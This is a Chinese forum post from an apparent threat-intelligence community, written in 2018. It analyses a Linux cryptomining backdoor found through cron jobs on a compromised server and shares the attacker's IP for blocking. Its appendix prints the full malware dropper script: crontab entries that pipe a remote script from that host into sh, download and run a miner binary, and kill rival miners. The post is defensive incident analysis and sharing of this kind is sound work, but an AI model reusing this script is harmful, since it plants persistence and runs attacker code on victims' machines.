Linux挖矿后门
Linux挖矿威胁情报分享(被植入计划任务)
AlickLIn 2018-08-03 17:56:49 2912人浏览

0、前言

咳咳,安全设备直接拉黑该IP的出入,防患于未然嘛,下文进行意识流派分析总结。

1、如何发现异常

机子异常,首先是从虚拟机管理工具发现CPU资源异常报警,判断机子里存在恶意进程占用资源。

进去机子敲打命令top查看进程资源占用top10,发现异常进程

锁定进程工作目录与恶意程序位置

删文件与Kill进程,恶意进程均死灰复燃。

脑袋一拍,随机查看计划任务。

1、计划任务

crontab -l命令查看计划任务:

curl -fsSL http://149.56.106.215:8000/i.sh | sh
wget -q -O- http://149.56.106.215:8000/i.sh | sh

3、入侵路径

1、应用漏洞

2、组件漏洞

3、系统漏洞

4、爆破

5、等等

总之,攻击者拥有了root权限写了个计划任务,攻击入口需要对相关安全日志,计划任务日志,应用服务日志等日志进行审计分析

4、大致溯源思路

1、查看crontab的日志定位最初一条计划任务执行时间

2、锁定好被植入计划任务时间,查看其他日志

3、secure可以对定位的时间查看有无爆破和异常登陆

4、web日志可以查看定位时间段内有无异常请求

5、总结

这是个情报共享,重点是IP:

149.56.106.215

拉入黑名单吧,记得出入都拉黑

6、附件

样本都在下面了,有需要自己下把

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
fir 2018-08-22 19:20:15 回复
这个真心可以啊
pumaxy 2018-08-18 11:23:25 回复
不错,添加任务管理的脚本
八级大狂风 2018-08-12 02:10:01 回复
黑客真的无孔不入
微步情报局 2018-08-03 20:34:58 回复
写得好认真,重积分奖励
AlickLIn 2018-08-04 11:25:53 回复
回复@微步情报局: 哈哈谢谢~